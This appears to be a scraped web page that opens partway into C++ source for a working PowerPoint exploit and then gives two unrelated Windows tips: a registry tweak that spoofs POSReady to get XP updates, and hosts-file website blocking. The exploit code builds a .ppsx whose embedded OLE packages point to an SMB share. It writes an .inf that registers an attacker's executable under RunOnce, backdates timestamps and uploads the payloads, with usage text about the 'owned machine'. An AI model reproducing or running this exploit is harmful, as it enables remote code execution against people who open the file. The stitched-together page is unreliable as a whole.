    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Release resources assigned with Presentation
    */
    SAFE_RELEASE_BY_REF( &pSlideShowTransition );
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Close Currently opened presentation
    */
    if (pPresentation) {

    pPresentation ->raw_Close();
    }
    SAFE_RELEASE_BY_REF( &pPresentation );

    SAFE_RELEASE_BY_REF( &pPresentations );

    /* Close powerpoint automation application
    */
    if (pApplication) {

    pApplication ->raw_Quit();
    }

    SAFE_RELEASE_BY_REF( &pApplication );

    return bres;
    }

    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {

    bool bresult = false;
    IStorage *pStorage = NULL;
    IStream *pStream = NULL;
    HRESULT hresult = S_OK;
    CLSID clsidMedia = {0};
    VOID *pvFileData = NULL;
    size_t dataSize = 0;
    ULONG bytesWritten = 0;
    char trailer = 0;
    wstring stdWstrFileNameOut;

    stdWstrFileNameOut.append(file_result);

    hresult =
    StgCreateStorageEx(
    stdWstrFileNameOut.c_str(),
    STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
    STGFMT_STORAGE,
    0,
    NULL,
    NULL,
    IID_IStorage,
    (void**)&pStorage
    );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): StgCreateStorageEx failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    hresult =
    pStorage ->CreateStream(
    L”x01OLE10Native”,
    STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
    0,
    0,
    &pStream
    );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStorage::CreateStream failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    dataSize = strlen(str1) + 1 + strlen(str2) + 1;

    // write header
    hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(header) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 1
    hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 1 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 2
    hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 2 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write class of storage
    hresult = CLSIDFromString( L”{00022602-0000-0000-C000-000000000046}”, &clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): CLSIDFromString failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    hresult = WriteClassStg(pStorage, clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): WriteClassStg failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    //printf(“[+] %s(): Storage %S created.rn”, __FUNCTION__, file_result);
    change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );

    bresult = true;

    _Done:
    SAFE_RELEASE_BY_REF( &pStream );

    SAFE_RELEASE_BY_REF( &pStorage );

    if(pvFileData) {

    free(pvFileData);
    }

    return bresult;

    }

    bool create_somthing_file(wchar_t *fpath) {

    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD bytesWritten = 0;

    hFile = CreateFileW(fpath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fpath);

    return false;
    }

    if (FALSE == WriteFile( hFile, “Some Datan”, strlen(“Some Datan”), &bytesWritten, NULL)) {

    wprintf(L”[-] ERROR: Cannot write temporary file %s with some datan”, fpath);

    CloseHandle(hFile);

    return false;
    }

    CloseHandle(hFile);

    return true;
    }

    bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {

    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD bytesWritten = 0;
    wstring stdFnameExeOnSmb;
    string stdFnameExeOnSmbA;
    string data;
    BOOL bres = FALSE;

    stdFnameExeOnSmb.append(fnameExeOnSmb);
    stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());

    hFile = CreateFileW( fnameInf, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fnameInf);

    return false;
    }

    data.append(“; 61883.INFn”);
    data.append(“; Copyright (c) Microsoft Corporation. All rights reserved.nn”);

    data.append(“[Version]n”);
    data.append(“Signature = “$CHICAGO$”n”);
    data.append(“Class=61883n”);
    data.append(“ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}n”);
    data.append(“Provider=%Msft%n”);
    data.append(“DriverVer=06/21/2006,6.1.7600.16385nn”);

    data.append(“[DestinationDirs]n”);
    data.append(“DefaultDestDir = 1nn”);

    data.append(“[DefaultInstall]n”);
    data.append(“RenFiles = RxRenamen”);
    data.append(“AddReg = RxStartnn”);

    data.append(“[RxRename]n”);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“.exe, “);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“n”);

    data.append(“[RxStart]n”);
    data.append(“HKLM,SoftwareMicrosoftWindowsCurrentVersionRunOnce,Install,,%1%”);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“.exen”);

    bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);

    FlushFileBuffers(hFile);

    CloseHandle(hFile);

    return (bres);
    }

    int wmain(int argc, wchar_t **argv) {

    wstring stdWstrSaveAs,
    stdWstrObject1,
    stdWstrObject2,
    stdWstrSavedAs;

    wstring stdFnamePptIn,
    stdSmbPath,
    stdFnameExe,
    stdFnameExeOnSmb,
    stdFnameInfOnSmb,
    stdPathExeOnSmb,
    stdPathInfOnSmb,
    stdPathTmp1,
    stdPathTmp2,
    stdPathInf,
    stdPathExe;
    string stdPathExeOnSmbA,
    stdPathInfOnSmbA;

    bool bForceUpload = false;

    wchar_t currDir[MAX_PATH];

    GetCurrentDirectoryW(MAX_PATH, currDir);

    if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {

    printf(“[-] ERROR: invalid inputn”);

    return 0;
    }

    CHK_HR( CoInitializeEx(NULL, COINIT_APARTMENTTHREADED));

    stdWstrSaveAs.append(stdFnamePptIn.c_str());

    stdWstrSaveAs.append(L”.saved.ppsx”);

    /* Construct a path to exe on SMB as %stdSmbPath%%stdFnameExeOnSmb%
    */
    stdPathExeOnSmb.append(stdSmbPath.c_str());
    stdPathExeOnSmb.append(L””);
    stdPathExeOnSmb.append(stdFnameExeOnSmb.c_str());
    stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());

    /* Construct a path to inf on SMB as %stdSmbPath%%stdFnameInfOnSmb%
    */
    stdPathInfOnSmb.append(stdSmbPath.c_str());
    stdPathInfOnSmb.append(L””);
    stdPathInfOnSmb.append(stdFnameInfOnSmb.c_str());
    stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());

    /* Construct a path to tmp1 file
    */
    stdPathTmp1.append(currDir);
    stdPathTmp1.append(L”tmp1.tmp”);

    if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {

    CHK_HR(E_ABORT);
    }

    /* Construct a path to tmp2 file
    */
    stdPathTmp2.append(currDir);
    stdPathTmp2.append(L”tmp2.tmp”);

    if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {

    CHK_HR(E_ABORT);
    }

    /* Modify presentation imm
    */
    if (!produce_presentation(
    (wchar_t*)stdFnamePptIn.c_str(),
    (wchar_t *)stdWstrSaveAs.c_str(),
    (wchar_t *) stdPathTmp1.c_str(),
    (wchar_t *) stdPathTmp2.c_str()
    ) )
    {

    printf(“[-] ERROR: cannot update presentationn”);

    CHK_HR( E_ABORT);
    }

    /* Create OLE 1-th Object
    */
    stdWstrObject1.append(currDir);
    stdWstrObject1.append(L””);
    stdWstrObject1.append(L”oleObject1.bin”);

    if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), “EmbeddedStg1.txt”, (char*)stdPathExeOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 1-th OLE Objectn”);

    CHK_HR( E_ABORT);
    }

    /* Create OLE 2-th Object
    */
    stdWstrObject2.append(currDir);
    stdWstrObject2.append(L””);
    stdWstrObject2.append(L”oleObject2.bin”);
    if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), “EmbeddedStg2.txt”, (char*)stdPathInfOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 2-th OLE Objectn”);

    CHK_HR( E_ABORT);
    }

    /* Generate inf file
    */
    stdPathInf.append(currDir);
    stdPathInf.append(L””);
    stdPathInf.append(stdFnameInfOnSmb.c_str());

    if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {

    printf(“[-] ERROR: Cannot generate inf filen”);
    CHK_HR(E_ABORT);
    }

    /* Generate exe for SMB
    */
    stdPathExe.append(currDir);
    stdPathExe.append(L””);
    stdPathExe.append(stdFnameExeOnSmb.c_str());

    if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
    wprintf(L”[-] ERROR: Cannot create ‘%s’ from ‘%s’n”, stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());

    CHK_HR(E_ABORT);
    }

    /* Upload files onto remote shared folder
    */
    if (bForceUpload) {

    if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .exe file ‘%s’ to ‘%s’n”, stdPathExe.c_str(), stdSmbPath.c_str());
    }

    if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .inf file ‘%s’ to ‘%s’n”, stdPathInf.c_str(), stdSmbPath.c_str());
    }
    }
    int step = 1;
    wprintf(L”[+] INFO: n”);
    wprintf(L” %d) Rename presentation file ‘%s’ to ‘%s.zip’;n”, step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
    wprintf(L” %d) Stupid MS developers cann’t create API for zip, so unzip ‘%s.zip’n”, step++, stdWstrSavedAs.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject1.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject2.c_str());
    wprintf(L” %d) Zip unzipped presentation and rename to presentation with ‘.ppsx’n”, step++);
    if (bForceUpload) {
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
    }
    wprintf(L” %d) Enjoy..n”, step++);

    _Done:

    DeleteFileW( stdPathTmp1.c_str());

    DeleteFileW( stdPathTmp2.c_str());

    CoUninitialize();

    return(__G_hresult);
    }

    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {

    bool bres = false;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape = NULL;
    PowerPoint::OLEFormat *pOLEFormat = NULL;
    long slidesCount = 0;
    VARIANT varSlideIndex,
    varShapeIndex;
    int shapesCount = 0;
    MsoAutoShapeType shapeType;
    BSTR bstrProgId = NULL;
    IDispatch *pOLEDispObject = NULL;

    assert(doesHave != NULL);
    assert(pPresentation != NULL);

    *doesHave = false;

    /* Get pointer to interface of Slides object.
    */
    CHK_HR(pPresentation ->get_Slides(&pSlides) );

    /* Get count of slides in presentation
    */
    CHK_HR(pSlides ->get_Count(&slidesCount) );

    /* Make sure that slides exist in presentation
    */
    if (slidesCount == 0) {

    printf(“[-] Failed couse no slides found in presentationn”);

    CHK_HR(E_FAIL);
    }

    for (long i = 1; i <= slidesCount; i ++) {

    VariantInitAsLong(varSlideIndex, i);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    VariantClear( &varSlideIndex );

    /* Get list of shapes
    */
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Get count of shapes
    */
    CHK_HR( pShapes ->get_Count(&shapesCount) );

    /* Verify each shape
    */
    for (int j = 1; j <= shapesCount; j++) {

    VariantInitAsLong( varShapeIndex, j);

    CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );

    VariantClear( &varShapeIndex );

    CHK_HR( pShape ->get_AutoShapeType( &shapeType) );

    if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {

    CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );

    CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );

    if (wcsicmp( L”Package”, bstrProgId) == 0) {

    *doesHave = true;
    }

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );

    SAFE_RELEASE_BY_REF( &pOLEFormat );
    }

    SAFE_RELEASE_BY_REF( &pShape );

    if (*doesHave) {

    break;
    }
    }
    ///////////

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    if (*doesHave) {

    break;
    }
    }

    bres = true;

    _Done:

    VariantClear( &varShapeIndex );

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );

    SAFE_RELEASE_BY_REF( &pOLEFormat );

    SAFE_RELEASE_BY_REF( &pShape );

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    SAFE_RELEASE_BY_REF( &pSlides );

    return bres;
    }

    bool change_file_time(wchar_t *fname) {

    SYSTEMTIME systemTime = {0};
    HANDLE hFile = INVALID_HANDLE_VALUE;
    FILETIME fileTime = {0};

    GetSystemTime( &systemTime);

    systemTime.wYear = 1980;
    systemTime.wMonth = 1;
    systemTime.wDay = 1;
    systemTime.wHour = 15;
    systemTime.wMinute = 0;
    systemTime.wSecond = 0;

    hFile =
    CreateFileW(
    fname,
    FILE_WRITE_ATTRIBUTES,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL
    );

    if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {

    return false;
    }

    SystemTimeToFileTime( &systemTime, &fileTime);

    SetFileTime( hFile, &fileTime, &fileTime, &fileTime);

    CloseHandle(hFile);

    return true;
    }

    bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
    /*++
    Oh fuck! Stupid Microsoft developers cann’t create human-relible
    API for zip management. 21st century! WTF? I cann’t use IShell
    interface for zip management, so use 3rd party zip archivers.
    –*/
    {

    bool bres = false;
    IShellDispatch *pShell = NULL;
    VARIANT varDir,
    varFile,
    varOption;
    Folder *pFolder = NULL;
    wstring stdWstrDir;

    VariantInit(&varDir);
    VariantInit(&varFile);
    VariantInit(&varOption);

    stdWstrDir.append(fnameZip);
    stdWstrDir.append(L”pptembeddings”);

    CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );

    varDir.vt = VT_BSTR;
    varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

    CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

    varFile.vt = VT_BSTR;
    varFile.bstrVal = _bstr_t(fnameData);

    varOption.vt = VT_I4;
    varOption.lVal = FOF_NO_UI;

    CHK_HR( pFolder ->CopyHere( varFile, varOption) );

    Sleep( 1000 );

    bres = true;

    _Done:

    //VariantClear( &varOption );
    //VariantClear( &varFile );
    //VariantClear( &varDir );

    SAFE_RELEASE_BY_REF( &pFolder );

    SAFE_RELEASE_BY_REF( &pShell );

    return bres;
    }

    bool parse_cmd(
    __in int argc,
    wchar_t **argv,
    wstring *fnamePptIn,
    wstring *smbPath,
    wstring *fnameExe,
    wstring *fnameExeOnSmb,
    wstring *fnameInfOnSmb,
    bool *bForceUpload
    )
    {
    wstring stdOpt;
    bool bFnamePptIn = false,
    bSmbPath = false,
    bFnameExe = false,
    bFnameExeOnSmb = false,
    bFnameInfOnSmb = false;

    if (argc < 11) {

    print_usage_and_exit(argv[0]);

    return false;
    }

    for (int i = 1; i < argc; i++) {

    stdOpt.clear();

    stdOpt.append(argv[i]);

    if (stdOpt.compare(L”–force-upload”) == 0) {

    *bForceUpload = true;

    continue;
    }

    if ((i+1) >= argc) {

    printf(“[-] ERROR: malformed inputn”);

    return false;
    }

    if ( stdOpt.compare(L”-p”) == 0 ) {

    fnamePptIn ->clear();

    fnamePptIn ->append( argv[i+1]);

    i+=1;

    bFnamePptIn = true;

    continue;
    }

    if ( stdOpt.compare(L”-smb”) == 0 ) {

    smbPath ->clear();

    smbPath ->append( argv[i+1]);

    i+=1;

    bSmbPath = true;

    continue;
    }

    if ( stdOpt.compare(L”-ef”) == 0 ) {

    fnameExe ->clear();

    fnameExe ->append( argv[i+1]);

    i+=1;

    bFnameExe = true;

    continue;
    }

    if ( stdOpt.compare(L”-eof”) == 0 ) {

    fnameExeOnSmb ->clear();

    fnameExeOnSmb ->append( argv[i+1]);

    i+=1;

    bFnameExeOnSmb = true;

    continue;
    }

    if ( stdOpt.compare(L”-iof”) == 0 ) {

    fnameInfOnSmb ->clear();

    fnameInfOnSmb ->append( argv[i+1]);

    i+=1;

    bFnameInfOnSmb = true;

    continue;
    }
    }

    if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {

    printf(“[-] ERROR: Not all options specifiedn”);

    return false;
    }

    return true;
    }

    void print_usage_and_exit(wchar_t *exe) {

    wprintf(
    L” **************************************************************** n”
    L”[?] Usage: %s [option|[option]…] n”
    L” **************************************************************** n”
    L” options: n”
    L” -p – path to input PowerPoint presentation file; n”
    L” -smb – UNC path on remote server in which files should be n”
    L” placed, f.e: 192.168.3.100public ; n”
    L” -ef – path to executable file to be launched on 0wned n”
    L” machine; content of file ‘ll be stored into -eof n”
    L” file; n”
    L” -eof – name of file into which -ef file’s content to be n”
    L” stored; exploit uploads this file onto -smb path n”
    L” automatically; make sure that -eof file is located n”
    L” on remote server before exploitation phase; n”
    L” -iof – name of .inf file to be stored on remote server; n”
    L” exploit extracts .inf stub from self and stores into n”
    L” file on remote host automatically; make sure that n”
    L” this file exists on remote server before exploitation n”
    L” phase; n”
    L” –force-upload n”
    L” – specifies explicit file’s uploading to remote server; n”
    L” **************************************************************** n”
    L” EXAMPLE: n”
    L” -p a.pptx -smb 192.168.0.1public -ef E:stub.exe n”
    L” -eof Config.xml -iof Preview.inf –force-upload n”
    L” creates a.pptx.saved.ppsx file from a.pptx; n”
    L” stores stub.exe into 192.168.0.1publicConfig.xml; n”
    L” stores .inf stub into 192.168.0.1publicPreview.inf; n”
    L” **************************************************************** n”
    L” NOTES: n”
    L” -smb, -iof, -eof are written into presentations, so make sure n”
    ” that specified things exist in real life; n”
    L” **************************************************************** n”,
    exe);

    ExitProcess(0);
    }

    /* EOF
    */

Microsoft XP updated until 2019 – tweak

The registry addition tricks Microsoft into thinking your PC is running the Point Of Sale “Embedded” version of Windows, which will continue to have updates until 2019. The change only works on 32-bit systems, not 64-bit. Microsoft warns this is a bad idea and suggests, naturally, you replace the operating system with Windows 7 or higher. If you make this change to an XP machine, you do this at your own risk. To make the change:

Make sure your computer is properly backed up in case anything goes wrong. Then, open Notepad to create a new text document.

Paste in the following text:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMWPAPosReady]  "Installed"=dword:00000001

Save the text file, but change its extension from .txt. to .reg.

Double-click your newly-created .reg file to make the tweak.

If you have a system that you can’t quite get rid of yet, this could make it last a bit longer. Hit the link below to read more about the tweak.

How to block access to a website

If you are concerned about someone in the family or workplace using a certain website, there are a few different methods of restricting access. Although it is possible to block access on a specific browser, many computers these days have more than one browser available to a user.

Another option is to edit a file within windows known as the hosts file. Using this method makes it possible to restrict access to a particular website regardless of what browser someone is using.

Step 1

Move the mouse to either the top or bottom right corner of the screen and the Charms menu will slide into place.

From this menu click on Search.

Select Search from Charms menu

Step 2

Make sure that Apps is selected and type Notepad.

On the left side of the screen, the Notepad should appear.

Search for notepad

Step 3

Do not double click on Notepad, instead click on it once to select it and a row of options will appear along the bottom of the screen.

From this row of options click on “Run as administrator”.

Select Run As Administrator from bottom row of options

Step 4

A small ‘User Account Control’ window may appear asking if you want to process – click “Yes”.

You will be taken to the desktop environment with a blank notepad file open.

Confirm UAC warning

Step 5

From the row of options along the top of the notepad file, click on File and from the drop-down list that appears click on Open.

A window will open with a column of options on the left. From these options we are looking for the C drive. In some cases it may be labelled as Local Disk. In other cases it may have the name of the computer’s manufacturer.

Open - Select C drive

Step 6

When you have located the C driveclick it once to highlight it and a number of folders will be listed on the right.

Scroll down the folders listed and double-click on the ‘Windows’ folder.

Select Windows folder

Step 7

You will then be displayed with all of the folders within the windows directory.

Scroll down again and this time double-click on the ‘System32’ folder.

Select System32 folder

Step 8

Within this folder, scroll through the available folders and double-click on ‘Drivers’.

Select Drivers folder

Step 9

This time you are looking for the ‘etc’ folder. Double-click on the ‘etc’ folder to open it and at first it may look like you have opened a blank folder.

Select etc folder

Step 10

Towards the bottom right corner of this window is an the item labelled Text Documents (*txt).Click on the arrow next to it and from the options listed click on ‘All files’.

Select All files from dropdown menu

Step 11

More files should now be listed – it is the ‘hosts’ file we are interested in.

Click on this file once to highlight it and then click Open.

Open the hosts file

Step 12

A notepad file should now open which is names ‘hosts’.

If you want to block access to a particular website, at the bottom of this file write the number: 127.0.0.1, press space-bar once and the enter the www address of the site you want to block.

For example if you wish to block Facebook type the following:

127.0.0.1 www.facebook.com

Notice that we DO NOT need to include a # symbol at the start of the line like the other lines in the file have.

Block access the facebook

Step 13

At the top click File and then Save. Bring up your Internet browser to test the website.

If the details were entered correctly you should not be able to access that particular website.

If you wish to do the same with any other websites, simply access the hosts file again in the same way and add the other website address at the bottom of the file.

If you change your mind at any point, access the hosts file again, delete the line with the blocked website address and Save the hosts file again.

Unable to access website